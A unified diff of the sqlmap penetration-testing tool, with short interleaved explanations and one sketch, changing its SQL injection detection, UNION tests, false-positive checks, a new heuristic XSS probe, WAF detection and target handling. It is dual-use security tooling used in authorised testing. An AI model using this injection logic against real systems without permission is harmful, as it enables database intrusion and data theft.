             prefix = boundary.prefix if boundary.prefix else ""
             suffix = boundary.suffix if boundary.suffix else ""
+            ptype = boundary.ptype
 
             # Options --prefix/--suffix have a higher priority (if set by user)
             prefix = conf.prefix if conf.prefix is not None else prefix
             suffix = conf.suffix if conf.suffix is not None else suffix
             comment = None if conf.suffix is not None else comment
 
-            ptype = boundary.ptype
-
             # If the previous injections succeeded, we know which prefix,
             # suffix and parameter type to use for further tests, no
             # need to cycle through the boundaries for the following tests
@@ -313,7 +341,9 @@ def checkSqlInjection(place, parameter, value):
             condBound &= (injection.prefix != prefix or injection.suffix != suffix)
             condType = injection.ptype is not None and injection.ptype != ptype
 
-            if condBound or condType:
+            # If the payload is an inline query test for it regardless
+            # of previously identified injection types
+            if stype != PAYLOAD.TECHNIQUE.QUERY and (condBound or condType):
                 continue
 
             # For each test's <where>
@@ -334,6 +364,7 @@ def checkSqlInjection(place, parameter, value):
                 # will likely result in a different content
                 kb.data.setdefault("randomInt", str(randomInt(10)))
                 kb.data.setdefault("randomStr", str(randomStr(10)))
 
                 if conf.invalidLogical:
                     _ = int(kb.data.randomInt[:2])
                     origValue = "%s AND %s=%s" % (value, _, _ + 1)
@@ -343,6 +374,7 @@ def checkSqlInjection(place, parameter, value):
                     origValue = kb.data.randomStr[:6]
                 else:
                     origValue = "-%s" % kb.data.randomInt[:4]
 
                 templatePayload = agent.payload(place, parameter, value="", newValue=origValue, where=where)
             elif where == PAYLOAD.WHERE.REPLACE:
                 origValue = ""
@@ -352,9 +384,17 @@ def checkSqlInjection(place, parameter, value):
                 # Forge request payload by prepending with boundary's
                 # prefix and appending the boundary's suffix to the
                 # test's ' <payload><comment> ' string
+                if fstPayload:
                     boundPayload = agent.prefixQuery(fstPayload, prefix, where, clause)
                     boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)
                     reqPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)
+
+                    if reqPayload:
+                        if reqPayload in seenPayload:
+                            continue
+                        else:
+                            seenPayload.add(reqPayload)
+                else:
+                    reqPayload = None
 
                 # Perform the test's request and check whether or not the
                 # payload was successful
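The new seenPayload set prevents the same forged request payload from being sent twice for a parameter. A hedged sketch of that deduplication in isolation:

```python
def iter_unique_payloads(candidate_payloads):
    # Yield each non-empty payload only the first time it is seen.
    seen = set()
    for payload in candidate_payloads:
        if payload is None or payload in seen:
            continue            # nothing to test, or already tested -> skip
        seen.add(payload)
        yield payload

if __name__ == "__main__":
    payloads = ["1 AND 1=1", "1 AND 1=1", None, "1' AND '1'='1"]
    print(list(iter_unique_payloads(payloads)))   # two unique payloads remain
```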
@@ -389,12 +429,12 @@ def checkSqlInjection(place, parameter, value):
                     trueResult = Request.queryPage(reqPayload, place, raise404=False)
                     truePage = threadData.lastComparisonPage or ""
 
-                    if trueResult:
+                    if trueResult and not(truePage == falsePage and not kb.nullConnection):
                         falseResult = Request.queryPage(genCmpPayload(), place, raise404=False)
 
                         # Perform the test's False request
                         if not falseResult:
-                            infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (place, parameter, title)
+                            infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (paramType, parameter, title)
                             logger.info(infoMsg)
 
                             injectable = True
@@ -403,9 +443,10 @@ def checkSqlInjection(place, parameter, value):
                             trueSet = set(extractTextTagContent(truePage))
                             falseSet = set(extractTextTagContent(falsePage))
                             candidates = filter(None, (_.strip() if _.strip() in (kb.pageTemplate or "") and _.strip() not in falsePage and _.strip() not in threadData.lastComparisonHeaders else None for _ in (trueSet - falseSet)))
 
                             if candidates:
                                 conf.string = candidates[0]
-                                infoMsg = "%s parameter '%s' seems to be '%s' injectable (with --string=\"%s\")" % (place, parameter, title, repr(conf.string).lstrip('u').strip("'"))
+                                infoMsg = "%s parameter '%s' seems to be '%s' injectable (with --string=\"%s\")" % (paramType, parameter, title, repr(conf.string).lstrip('u').strip("'"))
                                 logger.info(infoMsg)
 
                                 injectable = True
@@ -428,7 +469,7 @@ def checkSqlInjection(place, parameter, value):
                         result = output == "1"
 
                         if result:
-                            infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
+                            infoMsg = "%s parameter '%s' is '%s' injectable " % (paramType, parameter, title)
                             logger.info(infoMsg)
 
                             injectable = True
@@ -450,7 +491,7 @@ def checkSqlInjection(place, parameter, value):
                     trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)
 
                     if trueResult:
-                        infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (place, parameter, title)
+                        infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (paramType, parameter, title)
                         logger.info(infoMsg)
 
                         injectable = True
@@ -466,7 +507,7 @@ def checkSqlInjection(place, parameter, value):
                     configUnion(test.request.char, test.request.columns)
 
                     if not Backend.getIdentifiedDbms():
-                        if kb.heuristicDbms in (None, UNKNOWN_DBMS):
+                        if kb.heuristicDbms is None:
                             warnMsg = "using unescaped version of the test "
                             warnMsg += "because of zero knowledge of the "
                             warnMsg += "back-end DBMS. You can try to "
@@ -476,17 +517,28 @@ def checkSqlInjection(place, parameter, value):
                             Backend.forceDbms(kb.heuristicDbms)
 
                     if unionExtended:
-                        infoMsg = "automatically extending ranges "
-                        infoMsg += "for UNION query injection technique tests as "
+                        infoMsg = "automatically extending ranges for UNION "
+                        infoMsg += "query injection technique tests as "
                         infoMsg += "there is at least one other (potential) "
                         infoMsg += "technique found"
                         singleTimeLogMessage(infoMsg)
+                    elif not injection.data:
+                        _ = test.request.columns.split('-')[-1]
+                        if _.isdigit() and int(_) > 10:
+                            if kb.futileUnion is None:
+                                msg = "it is not recommended to perform "
+                                msg += "extended UNION tests if there is not "
+                                msg += "at least one other (potential) "
+                                msg += "technique found. Do you want to skip? [Y/n] "
+                                kb.futileUnion = readInput(msg, default="Y").strip().upper() == 'N'
+
+                            if kb.futileUnion is False:
+                                continue
 
                     # Test for UNION query SQL injection
                     reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix)
 
                     if isinstance(reqPayload, basestring):
-                        infoMsg = "%s parameter '%s' is '%s' injectable" % (place, parameter, title)
+                        infoMsg = "%s parameter '%s' is '%s' injectable" % (paramType, parameter, title)
                         logger.info(infoMsg)
 
                         injectable = True
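The elif branch above guards "futile" extended UNION tests: wide column ranges are only worth probing when some other (potential) technique has already been found, otherwise the user is asked whether to skip them. A sketch of that decision with hypothetical helper names:

```python
def should_run_extended_union(columns_spec, other_technique_found, ask=input):
    # columns_spec is a range like "1-20"; only prompt for wide ranges.
    upper = columns_spec.split('-')[-1]
    if other_technique_found or not upper.isdigit() or int(upper) <= 10:
        return True
    answer = ask("extended UNION tests with no other technique found. Skip? [Y/n] ")
    return answer.strip().upper() == 'N'    # only run them if the user says "n"

# e.g. should_run_extended_union("1-20", other_technique_found=False)
```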
@@ -497,7 +549,7 @@ def checkSqlInjection(place, parameter, value):
 
             kb.previousMethod = method
 
-            if conf.dummy:
+            if conf.dummy or conf.offline:
                 injectable = False
 
         # If the injection test was successful feed the injection
|
||||||
for dKey, dValue in test.details.items():
|
for dKey, dValue in test.details.items():
|
||||||
if dKey == "dbms":
|
if dKey == "dbms":
|
||||||
injection.dbms = dValue
|
injection.dbms = dValue
|
||||||
|
|
||||||
if not isinstance(dValue, list):
|
if not isinstance(dValue, list):
|
||||||
Backend.setDbms(dValue)
|
Backend.setDbms(dValue)
|
||||||
else:
|
else:
|
||||||
Backend.forceDbms(dValue[0], True)
|
Backend.forceDbms(dValue[0], True)
|
||||||
|
|
||||||
elif dKey == "dbms_version" and injection.dbms_version is None and not conf.testFilter:
|
elif dKey == "dbms_version" and injection.dbms_version is None and not conf.testFilter:
|
||||||
injection.dbms_version = Backend.setVersion(dValue)
|
injection.dbms_version = Backend.setVersion(dValue)
|
||||||
|
|
||||||
elif dKey == "os" and injection.os is None:
|
elif dKey == "os" and injection.os is None:
|
||||||
injection.os = Backend.setOs(dValue)
|
injection.os = Backend.setOs(dValue)
|
||||||
|
|
||||||
|
@@ -592,6 +647,7 @@ def checkSqlInjection(place, parameter, value):
                 choice = readInput(msg, default=str(conf.verbose), checkBatch=False).strip()
                 conf.verbose = int(choice)
                 setVerbosity()
+                tests.insert(0, test)
             elif choice[0] in ("n", "N"):
                 return None
             elif choice[0] in ("e", "E"):
@@ -627,13 +683,22 @@ def checkSqlInjection(place, parameter, value):
     return injection
 
 def heuristicCheckDbms(injection):
-    retVal = None
+    """
+    This functions is called when boolean-based blind is identified with a
+    generic payload and the DBMS has not yet been fingerprinted to attempt
+    to identify with a simple DBMS specific boolean-based test what the DBMS
+    may be
+    """
+    retVal = False
 
     pushValue(kb.injection)
     kb.injection = injection
-    randStr1, randStr2 = randomStr(), randomStr()
 
     for dbms in getPublicTypeMembers(DBMS, True):
+        if not FROM_DUMMY_TABLE.get(dbms, ""):
+            continue
+
+        randStr1, randStr2 = randomStr(), randomStr()
         Backend.forceDbms(dbms)
 
         if checkBooleanExpression("(SELECT '%s'%s)='%s'" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), randStr1)):
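heuristicCheckDbms() now starts from False, skips DBMSes that do not require a dummy table, and draws fresh random strings for each DBMS. A standalone sketch of the underlying probe, where check_expr stands in for sqlmap's checkBooleanExpression() and the dummy-table map is only an illustrative subset:

```python
import random
import string

# Assumed subset of per-DBMS dummy-table suffixes (e.g. Oracle requires DUAL).
FROM_DUMMY_TABLE = {"Oracle": " FROM DUAL", "Firebird": " FROM RDB$DATABASE"}

def heuristic_check_dbms(check_expr):
    # Ask the injection point to evaluate (SELECT '<rand>'<suffix>)='<rand>'
    # and keep the first DBMS for which the boolean expression holds.
    for dbms, suffix in FROM_DUMMY_TABLE.items():
        rand = "".join(random.choice(string.ascii_lowercase) for _ in range(6))
        if check_expr("(SELECT '%s'%s)='%s'" % (rand, suffix, rand)):
            return dbms
    return False    # mirrors the new "retVal = False" default
```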
@@ -645,7 +710,7 @@ def heuristicCheckDbms(injection):
     kb.injection = popValue()
 
     if retVal:
-        infoMsg = "heuristic (extended) test shows that the back-end DBMS " # not as important as "parsing" counter-part (because of false-positives)
+        infoMsg = "heuristic (extended) test shows that the back-end DBMS " # Not as important as "parsing" counter-part (because of false-positives)
         infoMsg += "could be '%s' " % retVal
         logger.info(infoMsg)
 
@@ -658,7 +723,8 @@ def checkFalsePositives(injection):
 
     retVal = injection
 
-    if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data):
+    if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or\
+       (len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and "Generic" in injection.data[PAYLOAD.TECHNIQUE.UNION].title):
         pushValue(kb.injection)
 
         infoMsg = "checking if the injection point on %s " % injection.place
@@ -671,16 +737,14 @@ def checkFalsePositives(injection):
         kb.injection = injection
 
         for i in xrange(conf.level):
+            while True:
             randInt1, randInt2, randInt3 = (_() for j in xrange(3))
 
             randInt1 = min(randInt1, randInt2, randInt3)
             randInt3 = max(randInt1, randInt2, randInt3)
 
-            while randInt1 >= randInt2:
-                randInt2 = _()
-
-            while randInt2 >= randInt3:
-                randInt3 = _()
+                if randInt3 > randInt2 > randInt1:
+                    break
 
             if not checkBooleanExpression("%d=%d" % (randInt1, randInt1)):
                 retVal = None
|
||||||
|
|
||||||
def heuristicCheckSqlInjection(place, parameter):
|
def heuristicCheckSqlInjection(place, parameter):
|
||||||
if kb.nullConnection:
|
if kb.nullConnection:
|
||||||
debugMsg = "heuristic check skipped "
|
debugMsg = "heuristic check skipped because NULL connection used"
|
||||||
debugMsg += "because NULL connection used"
|
|
||||||
logger.debug(debugMsg)
|
|
||||||
return None
|
|
||||||
|
|
||||||
if wasLastResponseDBMSError():
|
|
||||||
debugMsg = "heuristic check skipped "
|
|
||||||
debugMsg += "because original page content "
|
|
||||||
debugMsg += "contains DBMS error"
|
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
return None
|
return None
|
||||||
|
|
||||||
origValue = conf.paramDict[place][parameter]
|
origValue = conf.paramDict[place][parameter]
|
||||||
|
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
|
||||||
prefix = ""
|
prefix = ""
|
||||||
suffix = ""
|
suffix = ""
|
||||||
|
|
||||||
|
@ -788,6 +844,7 @@ def heuristicCheckSqlInjection(place, parameter):
|
||||||
suffix = conf.suffix
|
suffix = conf.suffix
|
||||||
|
|
||||||
randStr = ""
|
randStr = ""
|
||||||
|
|
||||||
while '\'' not in randStr:
|
while '\'' not in randStr:
|
||||||
randStr = randomStr(length=10, alphabet=HEURISTIC_CHECK_ALPHABET)
|
randStr = randomStr(length=10, alphabet=HEURISTIC_CHECK_ALPHABET)
|
||||||
|
|
||||||
|
@ -802,8 +859,8 @@ def heuristicCheckSqlInjection(place, parameter):
|
||||||
parseFilePaths(page)
|
parseFilePaths(page)
|
||||||
result = wasLastResponseDBMSError()
|
result = wasLastResponseDBMSError()
|
||||||
|
|
||||||
infoMsg = "heuristic (basic) test shows that %s " % place
|
infoMsg = "heuristic (basic) test shows that %s parameter " % paramType
|
||||||
infoMsg += "parameter '%s' might " % parameter
|
infoMsg += "'%s' might " % parameter
|
||||||
|
|
||||||
def _(page):
|
def _(page):
|
||||||
return any(_ in (page or "") for _ in FORMAT_EXCEPTION_STRINGS)
|
return any(_ in (page or "") for _ in FORMAT_EXCEPTION_STRINGS)
|
||||||
|
@@ -844,6 +901,22 @@ def heuristicCheckSqlInjection(place, parameter):
         infoMsg += "not be injectable"
         logger.warn(infoMsg)

+    kb.heuristicMode = True
+
+    value = "%s%s%s" % (randomStr(), DUMMY_XSS_CHECK_APPENDIX, randomStr())
+    payload = "%s%s%s" % (prefix, "'%s" % value, suffix)
+    payload = agent.payload(place, parameter, newValue=payload)
+    page, _ = Request.queryPage(payload, place, content=True, raise404=False)
+
+    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
+
+    if value in (page or ""):
+        infoMsg = "heuristic (XSS) test shows that %s parameter " % paramType
+        infoMsg += "'%s' might be vulnerable to XSS attacks" % parameter
+        logger.info(infoMsg)
+
+    kb.heuristicMode = False
+
     return kb.heuristicTest

 def checkDynParam(place, parameter, value):
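The added block bolts a quick reflected-XSS heuristic onto the SQL injection heuristic: it sends a marker wrapped in random padding and checks whether it comes back verbatim in the response. A hedged sketch of the same check using a generic HTTP client (the `requests` usage and helper names are assumptions for illustration, not sqlmap's implementation):

    import random
    import string

    import requests  # assumption: any HTTP client works here

    def heuristic_xss_check(url, param, params):
        # Marker containing characters that must survive output encoding
        # for the reflection to be interesting (analogous to the appendix above).
        marker = "<'\">"
        rand = lambda: "".join(random.choice(string.ascii_lowercase) for _ in range(6))
        value = "%s%s%s" % (rand(), marker, rand())

        probe = dict(params, **{param: value})
        page = requests.get(url, params=probe).text

        # If the full tainted value is reflected unchanged, the parameter is a
        # candidate for XSS and worth a closer look with a dedicated tool.
        return value in (page or "")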
@@ -860,7 +933,9 @@ def checkDynParam(place, parameter, value):
     dynResult = None
     randInt = randomInt()

-    infoMsg = "testing if %s parameter '%s' is dynamic" % (place, parameter)
+    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
+
+    infoMsg = "testing if %s parameter '%s' is dynamic" % (paramType, parameter)
     logger.info(infoMsg)

     try:

@@ -868,7 +943,7 @@ def checkDynParam(place, parameter, value):
         dynResult = Request.queryPage(payload, place, raise404=False)

         if not dynResult:
-            infoMsg = "confirming that %s parameter '%s' is dynamic" % (place, parameter)
+            infoMsg = "confirming that %s parameter '%s' is dynamic" % (paramType, parameter)
             logger.info(infoMsg)

             randInt = randomInt()
@@ -937,11 +1012,15 @@ def checkStability():
    like for instance string matching (--string).
    """

-    infoMsg = "testing if the target URL is stable. This can take a couple of seconds"
+    infoMsg = "testing if the target URL is stable"
    logger.info(infoMsg)

    firstPage = kb.originalPage  # set inside checkConnection()
-    time.sleep(1)
+
+    delay = 1 - (time.time() - (kb.originalPageTime or 0))
+    delay = max(0, min(1, delay))
+    time.sleep(delay)

    secondPage, _ = Request.queryPage(content=True, raise404=False)

    if kb.redirectChoice:
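Instead of always sleeping a full second before re-requesting the page, the new code subtracts the time already spent since the original request and clamps the result to the [0, 1] interval. A small sketch of that computation, with the kb/conf fields replaced by plain variables:

    import time

    def remaining_delay(original_page_time, window=1.0):
        # Sleep only for whatever part of the window has not already elapsed.
        delay = window - (time.time() - (original_page_time or 0))
        return max(0, min(window, delay))

    # usage: time.sleep(remaining_delay(original_page_time))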
@@ -1060,59 +1139,38 @@ def checkWaf():
    Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse
    """

-    if not conf.checkWaf:
-        return False
+    if any((conf.string, conf.notString, conf.regexp, conf.dummy, conf.offline)):
+        return None

-    infoMsg = "heuristically checking if the target is protected by "
-    infoMsg += "some kind of WAF/IPS/IDS"
-    logger.info(infoMsg)
+    dbmMsg = "heuristically checking if the target is protected by "
+    dbmMsg += "some kind of WAF/IPS/IDS"
+    logger.debug(dbmMsg)

    retVal = False

-    backup = dict(conf.parameters)
-
    payload = "%d %s" % (randomInt(), IDS_WAF_CHECK_PAYLOAD)

-    conf.parameters = dict(backup)
-    conf.parameters[PLACE.GET] = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + "&"
-    conf.parameters[PLACE.GET] += "%s=%s" % (randomStr(), payload)
-
-    logger.log(CUSTOM_LOGGING.PAYLOAD, payload)
-
-    kb.matchRatio = None
-    Request.queryPage()
-
-    if kb.errorIsNone and kb.matchRatio is None:
-        kb.matchRatio = LOWER_RATIO_BOUND
-
-    conf.parameters = dict(backup)
-    conf.parameters[PLACE.GET] = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + "&"
-    conf.parameters[PLACE.GET] += "%s=%d" % (randomStr(), randomInt())
-
-    trueResult = Request.queryPage()
-
-    if trueResult:
-        conf.parameters = dict(backup)
-        conf.parameters[PLACE.GET] = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + "&"
-        conf.parameters[PLACE.GET] += "%s=%d %s" % (randomStr(), randomInt(), IDS_WAF_CHECK_PAYLOAD)
+    value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
+    value += agent.addPayloadDelimiters("%s=%s" % (randomStr(), payload))

-        try:
-            falseResult = Request.queryPage()
-        except SqlmapConnectionException:
-            falseResult = None
-
-        if not falseResult:
-            retVal = True
-
-    conf.parameters = dict(backup)
+    try:
+        retVal = Request.queryPage(place=PLACE.GET, value=value, getRatioValue=True, noteResponseTime=False, silent=True)[1] < IDS_WAF_CHECK_RATIO
+    except SqlmapConnectionException:
+        retVal = True
+    finally:
+        kb.matchRatio = None

    if retVal:
-        warnMsg = "it appears that the target is protected. Please "
-        warnMsg += "consider usage of tamper scripts (option '--tamper')"
-        logger.warn(warnMsg)
-    else:
-        infoMsg = "it appears that the target is not protected"
-        logger.info(infoMsg)
+        warnMsg = "heuristics detected that the target "
+        warnMsg += "is protected by some kind of WAF/IPS/IDS"
+        logger.critical(warnMsg)
+
+        if not conf.identifyWaf:
+            message = "do you want sqlmap to try to detect backend "
+            message += "WAF/IPS/IDS? [y/N] "
+            output = readInput(message, default="N")
+
+            if output and output[0] in ("Y", "y"):
+                conf.identifyWaf = True

    return retVal
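The rewritten checkWaf() no longer compares a "true" and a "false" request by hand; it appends a throw-away GET parameter carrying a known attack payload and asks the page-comparison engine for the similarity ratio against the original page, flagging a WAF/IPS/IDS when the ratio drops below IDS_WAF_CHECK_RATIO (or the connection is dropped). A standalone sketch of the same idea using difflib; the threshold, payload string and helper names are assumptions, not sqlmap's constants:

    import difflib
    import random
    import string

    import requests  # assumption: plain HTTP client instead of sqlmap's Request

    WAF_CHECK_RATIO = 0.5  # assumed threshold, analogous to IDS_WAF_CHECK_RATIO
    ATTACK_SUFFIX = "AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1--"

    def looks_protected(url, params):
        baseline = requests.get(url, params=params).text or ""

        # Add a junk parameter carrying an obviously malicious-looking value.
        junk = "".join(random.choice(string.ascii_lowercase) for _ in range(8))
        tainted = dict(params, **{junk: "%d %s" % (random.randint(1, 10000), ATTACK_SUFFIX)})
        probed = requests.get(url, params=tainted).text or ""

        # A blocked or heavily rewritten response is much less similar to the baseline.
        ratio = difflib.SequenceMatcher(None, baseline, probed).ratio()
        return ratio < WAF_CHECK_RATIO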
@@ -1130,6 +1188,8 @@ def identifyWaf():
    def _(*args, **kwargs):
        page, headers, code = None, None, None
        try:
+            pushValue(kb.redirectChoice)
+            kb.redirectChoice = REDIRECTION.NO
            if kwargs.get("get"):
                kwargs["get"] = urlencode(kwargs["get"])
            kwargs["raise404"] = False

@@ -1137,6 +1197,8 @@ def identifyWaf():
            page, headers, code = Request.getPage(*args, **kwargs)
        except Exception:
            pass
+        finally:
+            kb.redirectChoice = popValue()
        return page or "", headers or {}, code

    retVal = False

@@ -1168,9 +1230,10 @@ def identifyWaf():
            if output and output[0] not in ("Y", "y"):
                raise SqlmapUserQuitException
    else:
-        infoMsg = "no WAF/IDS/IPS product has been identified"
-        logger.info(infoMsg)
+        warnMsg = "no WAF/IDS/IPS product has been identified"
+        logger.warn(warnMsg)

+    kb.testType = None
    kb.testMode = False

    return retVal
@@ -1186,10 +1249,10 @@ def checkNullConnection():
    infoMsg = "testing NULL connection to the target URL"
    logger.info(infoMsg)

+    try:
        pushValue(kb.pageCompress)
        kb.pageCompress = False

-    try:
        page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD)

        if not page and HTTP_HEADER.CONTENT_LENGTH in (headers or {}):

@@ -1219,27 +1282,31 @@ def checkNullConnection():
            errMsg = getUnicode(errMsg)
            raise SqlmapConnectionException(errMsg)

+    finally:
        kb.pageCompress = popValue()

    return kb.nullConnection is not None

def checkConnection(suppressOutput=False):
-    if not any((conf.proxy, conf.tor, conf.dummy)):
+    if not any((conf.proxy, conf.tor, conf.dummy, conf.offline)):
        try:
+            debugMsg = "resolving hostname '%s'" % conf.hostname
+            logger.debug(debugMsg)
            socket.getaddrinfo(conf.hostname, None)
        except socket.gaierror:
            errMsg = "host '%s' does not exist" % conf.hostname
            raise SqlmapConnectionException(errMsg)
        except socket.error, ex:
            errMsg = "problem occurred while "
-            errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, str(ex))
+            errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, ex.message)
            raise SqlmapConnectionException(errMsg)

-    if not suppressOutput and not conf.dummy:
+    if not suppressOutput and not conf.dummy and not conf.offline:
        infoMsg = "testing connection to the target URL"
        logger.info(infoMsg)

    try:
+        kb.originalPageTime = time.time()
        page, _ = Request.queryPage(content=True, noteResponseTime=False)
        kb.originalPage = kb.pageTemplate = page
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -28,7 +28,10 @@ from lib.core.common import getUnicode
 from lib.core.common import hashDBRetrieve
 from lib.core.common import hashDBWrite
 from lib.core.common import intersect
+from lib.core.common import isListLike
 from lib.core.common import parseTargetUrl
+from lib.core.common import popValue
+from lib.core.common import pushValue
 from lib.core.common import randomStr
 from lib.core.common import readInput
 from lib.core.common import safeCSValue
@@ -126,8 +129,8 @@ def _selectInjection():
    kb.injection = kb.injections[index]

def _formatInjection(inj):
-    data = "Place: %s\n" % inj.place
-    data += "Parameter: %s\n" % inj.parameter
+    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else inj.place
+    data = "Parameter: %s (%s)\n" % (inj.parameter, paramType)

    for stype, sdata in inj.data.items():
        title = sdata.title

@@ -146,14 +149,17 @@ def _formatInjection(inj):
        vector = "%s%s" % (vector, comment)
        data += "    Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
        data += "    Title: %s\n" % title
-        data += "    Payload: %s\n" % urldecode(payload, unsafe="&", plusspace=(inj.place == PLACE.POST and kb.postSpaceToPlus))
+        data += "    Payload: %s\n" % urldecode(payload, unsafe="&", plusspace=(inj.place != PLACE.GET and kb.postSpaceToPlus))
        data += "    Vector: %s\n\n" % vector if conf.verbose > 1 else "\n"

    return data

def _showInjections():
-    header = "sqlmap identified the following injection points with "
-    header += "a total of %d HTTP(s) requests" % kb.testQueryCount
+    if kb.testQueryCount > 0:
+        header = "sqlmap identified the following injection point(s) with "
+        header += "a total of %d HTTP(s) requests" % kb.testQueryCount
+    else:
+        header = "sqlmap resumed the following injection point(s) from stored session"

    if hasattr(conf, "api"):
        conf.dumper.string("", kb.injections, content_type=CONTENT_TYPE.TECHNIQUES)
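The report format above collapses the old "Place:" / "Parameter:" pair into a single line where the type shown is the custom HTTP method when one is used and the placement otherwise. A toy formatter showing the resulting shape (illustrative only, not sqlmap's code):

    def format_injection_header(parameter, place, method=None):
        # Custom methods (e.g. PUT) take precedence over the generic placement.
        param_type = method if method not in (None, "GET", "POST") else place
        return "Parameter: %s (%s)" % (parameter, param_type)

    # format_injection_header("id", "GET")        -> 'Parameter: id (GET)'
    # format_injection_header("id", "URI", "PUT") -> 'Parameter: id (PUT)'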
@@ -189,7 +195,9 @@ def _randomFillBlankFields(value):
    return retVal

def _saveToHashDB():
-    injections = hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []
+    injections = hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True)
+    if not isListLike(injections):
+        injections = []
    injections.extend(_ for _ in kb.injections if _ and _.place is not None and _.parameter is not None)

    _ = dict()

@@ -251,7 +259,7 @@ def start():
        return True

    if conf.url and not any((conf.forms, conf.crawlDepth)):
-        kb.targets.add((conf.url, conf.method, conf.data, conf.cookie))
+        kb.targets.add((conf.url, conf.method, conf.data, conf.cookie, None))

    if conf.configFile and not kb.targets:
        errMsg = "you did not edit the configuration file properly, set "

@@ -264,13 +272,16 @@ def start():
    logger.info(infoMsg)

    hostCount = 0
+    initialHeaders = list(conf.httpHeaders)

-    for targetUrl, targetMethod, targetData, targetCookie in kb.targets:
+    for targetUrl, targetMethod, targetData, targetCookie, targetHeaders in kb.targets:
        try:
            conf.url = targetUrl
-            conf.method = targetMethod
+            conf.method = targetMethod.upper() if targetMethod else targetMethod
            conf.data = targetData
            conf.cookie = targetCookie
+            conf.httpHeaders = list(initialHeaders)
+            conf.httpHeaders.extend(targetHeaders or [])

            initTargetEnv()
            parseTargetUrl()
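Targets are now 5-tuples that can carry their own extra HTTP headers, and for each target the global header list is reset to its initial copy before the per-target headers are appended, so headers cannot leak from one target to the next. A sketch of that reset-then-extend pattern (plain data structures, not sqlmap's conf object):

    def iterate_targets(targets, initial_headers):
        # targets: iterable of (url, method, data, cookie, headers) tuples
        for url, method, data, cookie, target_headers in targets:
            headers = list(initial_headers)        # start from a clean copy every time
            headers.extend(target_headers or [])   # then add per-target extras
            yield url, (method.upper() if method else method), data, cookie, headers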
@@ -308,13 +319,13 @@ def start():
            if conf.forms:
                message = "[#%d] form:\n%s %s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl)
            else:
-                message = "URL %d:\n%s %s%s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl, " (PageRank: %s)" % get_pagerank(targetUrl) if conf.googleDork and conf.pageRank else "")
+                message = "URL %d:\n%s %s%s" % (hostCount, HTTPMETHOD.GET, targetUrl, " (PageRank: %s)" % get_pagerank(targetUrl) if conf.googleDork and conf.pageRank else "")

            if conf.cookie:
                message += "\nCookie: %s" % conf.cookie

            if conf.data is not None:
-                message += "\nPOST data: %s" % urlencode(conf.data) if conf.data else ""
+                message += "\n%s data: %s" % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST, urlencode(conf.data) if conf.data else "")

            if conf.forms:
                if conf.method == HTTPMETHOD.GET and targetUrl.find("?") == -1:

@@ -324,13 +335,13 @@ def start():
                test = readInput(message, default="Y")

                if not test or test[0] in ("y", "Y"):
-                    if conf.method == HTTPMETHOD.POST:
-                        message = "Edit POST data [default: %s]%s: " % (urlencode(conf.data) if conf.data else "None", " (Warning: blank fields detected)" if conf.data and extractRegexResult(EMPTY_FORM_FIELDS_REGEX, conf.data) else "")
+                    if conf.method != HTTPMETHOD.GET:
+                        message = "Edit %s data [default: %s]%s: " % (conf.method, urlencode(conf.data) if conf.data else "None", " (Warning: blank fields detected)" if conf.data and extractRegexResult(EMPTY_FORM_FIELDS_REGEX, conf.data) else "")
                        conf.data = readInput(message, default=conf.data)
                        conf.data = _randomFillBlankFields(conf.data)
                        conf.data = urldecode(conf.data) if conf.data and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data

-                    elif conf.method == HTTPMETHOD.GET:
+                    else:
                        if targetUrl.find("?") > -1:
                            firstPart = targetUrl[:targetUrl.find("?")]
                            secondPart = targetUrl[targetUrl.find("?") + 1:]

@@ -366,7 +377,6 @@ def start():
            if not checkConnection(suppressOutput=conf.forms) or not checkString() or not checkRegexp():
                continue

-            if conf.checkWaf:
                checkWaf()

            if conf.identifyWaf:
@@ -420,11 +430,16 @@ def start():
                if skip:
                    continue

+                if kb.testOnlyCustom and place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER):
+                    continue
+
                if place not in conf.paramDict:
                    continue

